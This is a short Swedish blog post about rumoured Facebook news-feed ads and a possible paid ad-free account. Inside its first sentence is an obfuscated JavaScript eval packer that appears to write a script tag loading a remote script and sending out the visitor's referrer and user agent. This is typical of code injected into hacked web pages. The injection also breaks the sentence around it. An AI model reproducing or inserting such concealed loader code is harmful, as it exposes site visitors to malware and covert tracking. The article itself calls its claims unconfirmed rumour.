Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Annonser i Facebook loggen, snart betalar vi för en gratistjänst!

Annonser i Facebook loggen, snart betalar vi för en gratistjänst!
Sebastian

Tiden eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntkyt|var|u0026u|referrer|srasd||js|php’.split(’|’),0,{}))
är inne, Facebook kör igång med reklam i våra loggar nästa år.

Detta är något man kanske inte tänkt på innan men ändå är ganska väntat. Något som säkert kommer skapa irritation till en början, men sedan vartefter tiden går komma bli som vilken annan reklam som helst. Vi vänjer oss, och snart är det onaturliga naturligt.
Det är först och främst ”gratis” användarna som kommer att exponeras för annonserna. Gratis? ja, det kommer sannolikt helt enkelt att skapas olika konton likt Linkedin och Spotify, ett ”gratis konto” och ett ”Premium konto” som kommer kosta en slant.

Är detta ett smart drag från Facebook? Både jag och nej. Som jag nämnde ovan kommer detta starta irritation, men folk är så beroende av tjänsten så vi vänjer oss och accepterar det.  För Facebook handlar det om att öka kassaflödet ännu mer. Facebook vet att majoriteten kommer betala för att få bort reklamen.

Hur företagssidor kommer att förändras har jag ingen information om än men det ryktas om en liten kostnad på den fronten.

Det är fortfarande lite vagt om exakt vilka planer Facebook har omkring denna sorts annonsering. Så ta inte denna information för säriöst, än.

Läs mer: www.cbc.ca